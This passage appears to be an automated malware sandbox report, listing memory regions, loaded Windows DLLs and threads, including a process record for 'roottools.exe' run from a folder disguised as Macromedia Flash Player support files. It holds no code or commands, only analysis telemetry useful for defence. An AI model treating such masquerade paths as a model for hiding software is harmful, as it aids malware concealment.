"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3672 start_va = 0x7feffad0000 end_va = 0x7feffb36fff entry_point = 0x7feffad0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3673 start_va = 0x7feffb40000 end_va = 0x7feffc6cfff entry_point = 0x7feffb40000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3674 start_va = 0x7feffc70000 end_va = 0x7feffd46fff entry_point = 0x7feffc70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3675 start_va = 0x7feffd50000 end_va = 0x7feffd57fff entry_point = 0x7feffd50000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3676 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3677 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3678 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3679 start_va = 0x7fefddf0000 end_va = 0x7fefdef8fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3680 start_va = 0x7fefe220000 end_va = 0x7fefe24dfff entry_point = 0x7fefe220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3681 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3682 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3683 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3684 start_va = 0x160000 end_va = 0x21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3685 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 3686 start_va = 0x600000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3687 start_va = 0x810000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 3688 start_va = 0x8d0000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 3689 start_va = 0x950000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 3690 start_va = 0xa50000 end_va = 0xd1efff entry_point = 0xa50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3691 start_va = 0xd20000 end_va = 0x1112fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 3692 start_va = 0x7fefd910000 end_va = 0x7fefd91efff entry_point = 0x7fefd910000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3693 start_va = 0x7fefca10000 end_va = 0x7fefca3cfff entry_point = 0x7fefca10000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3694 start_va = 0x7fefe460000 end_va = 0x7fefe4b1fff entry_point = 0x7fefe460000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3695 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3696 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3697 start_va = 0x1130000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 3698 start_va = 0x12b0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 3699 start_va = 0x7fefea20000 end_va = 0x7fefeab8fff entry_point = 0x7fefea20000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3700 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3701 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3702 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3703 start_va = 0x7fef6360000 end_va = 0x7fef636efff entry_point = 0x7fef6360000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3704 start_va = 0x11e0000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 3705 start_va = 0x7fefd330000 end_va = 0x7fefd346fff entry_point = 0x7fefd330000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3706 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3707 start_va = 0x7fefd030000 end_va = 0x7fefd076fff entry_point = 0x7fefd030000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3708 start_va = 0x7fefda00000 end_va = 0x7fefda13fff entry_point = 0x7fefda00000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3709 start_va = 0x13c0000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 3710 start_va = 0x14f0000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 3711 start_va = 0x1580000 end_va = 0x15fffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 3712 start_va = 0x7fef6100000 end_va = 0x7fef6125fff entry_point = 0x7fef6100000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3713 start_va = 0x7fef61a0000 end_va = 0x7fef61b3fff entry_point = 0x7fef61a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3714 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3715 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3716 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3717 start_va = 0x7fef34c0000 end_va = 0x7fef36b9fff entry_point = 0x7fef34c0000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 3718 start_va = 0x7fef39a0000 end_va = 0x7fef39ebfff entry_point = 0x7fef39a0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3719 start_va = 0x7fefbd70000 end_va = 0x7fefbd80fff entry_point = 0x7fefbd70000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3720 start_va = 0x7fefd8e0000 end_va = 0x7fefd904fff entry_point = 0x7fefd8e0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Thread: id = 299 os_tid = 0x73c Thread: id = 300 os_tid = 0x5ec Thread: id = 301 os_tid = 0x6b0 Thread: id = 302 os_tid = 0x7dc Thread: id = 303 os_tid = 0x7f0 Thread: id = 304 os_tid = 0x328 Thread: id = 305 os_tid = 0x7ec Thread: id = 306 os_tid = 0x7c8 Thread: id = 326 os_tid = 0x46c Thread: id = 329 os_tid = 0x1f0 Process: id = "22" image_name = "roottools.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" page_root = "0x62fe3000" os_pid = "0x7e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x594" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"" cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3760 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3761 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3762 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3763 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3764 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3765 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3766 start_va = 0x400000 end_va = 0x432fff entry_point = 0x400000 region_type = mapped_file name = "roottools.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") Region: id = 3767 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3768 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3769 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3770 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3771 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3772 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3773 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3774 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3775 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3776 start_va = 0x280000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3777 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3778 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3779 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3780 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3781 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3782 start_va = 0x520000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3783 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 3784 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 3785 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3786 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3787 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3788 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3789 start_va = 0x75ae0000 end_va = 0x75c3bfff entry_point = 0x75ae0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3790 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3791 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3792 start_va = 0x761b0000 end_va = 0x7623efff entry_point = 0x761b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3793 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3794 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3795 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3796 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3797 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3798 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3799 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 3800 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 3801 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3802 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3803 start_va = 0x780000 end_va = 0x907fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3804 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3805 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3806 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3807 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3808 start_va = 0x910000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 3809 start_va = 0xaa0000 end_va = 0x1e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 3810 start_va = 0x210000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3811 start_va = 0x1ea0000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3812 start_va = 0x22a0000 end_va = 0x256efff entry_point = 0x22a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3813 start_va = 0x2570000 end_va = 0x278ffff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3814 start_va = 0x300000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3815 start_va = 0x741b0000 end_va = 0x7422ffff entry_point = 0x741b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3816 start_va = 0x440000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3817 start_va = 0x620000 end_va = 0x6fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 3818 start_va = 0x2570000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3819 start_va = 0x2750000 end_va = 0x278ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 3820 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3821 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3822 start_va = 0x74e30000 end_va = 0x74e8efff entry_point = 0x74e30000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 3823 start_va = 0x74130000 end_va = 0x74142fff entry_point = 0x74130000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3824 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 3825 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3826 start_va = 0x2790000 end_va = 0x2b82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 3827 start_va = 0x2b90000 end_va = 0x34bffff entry_point = 0x2b90000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 3828 start_va = 0x2570000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3829 start_va = 0x26f0000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 3830 start_va = 0x76a70000 end_va = 0x776b9fff entry_point = 0x76a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3831 start_va = 0x76370000 end_va = 0x763c6fff entry_point = 0x76370000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3833 start_va = 0x756b0000 end_va = 0x756cbfff entry_point = 0x756b0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3834 start_va = 0x767f0000 end_va = 0x767f5fff entry_point = 0x767f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3835 start_va = 0x756e0000 end_va = 0x756e6fff entry_point = 0x756e0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3836 start_va = 0x240000 end_va = 0x247fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3837 start_va = 0x74fd0000 end_va = 0x74fe1fff entry_point = 0x74fd0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 3838 start_va = 0x777e0000 end_va = 0x77814fff entry_point = 0x777e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3839 start_va = 0x34c0000 end_va = 0x364ffff entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 3840 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3841 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3842 start_va = 0x25f0000 end_va = 0x26effff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 3843 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 3844 start_va = 0x3650000 end_va = 0xb64ffff entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 3845 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3846 start_va = 0x76240000 end_va = 0x7635cfff entry_point = 0x76240000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3847 start_va = 0x76360000 end_va = 0x7636bfff entry_point = 0x76360000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3848 start_va = 0x75ad0000 end_va = 0x75ad4fff entry_point = 0x75ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 3849 start_va = 0x75f20000 end_va = 0x76014fff entry_point = 0x75f20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3850 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3851 start_va = 0x75c40000 end_va = 0x75e3afff entry_point = 0x75c40000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3852 start_va = 0x75690000 end_va = 0x75697fff entry_point = 0x75690000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3853 start_va = 0x34c0000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 3854 start_va = 0x3610000 end_va = 0x364ffff entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 3855 start_va = 0x75670000 end_va = 0x75685fff entry_point = 0x75670000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3856 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3857 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3858 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3859 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3860 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3861 start_va = 0x75630000 end_va = 0x7566afff entry_point = 0x75630000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: 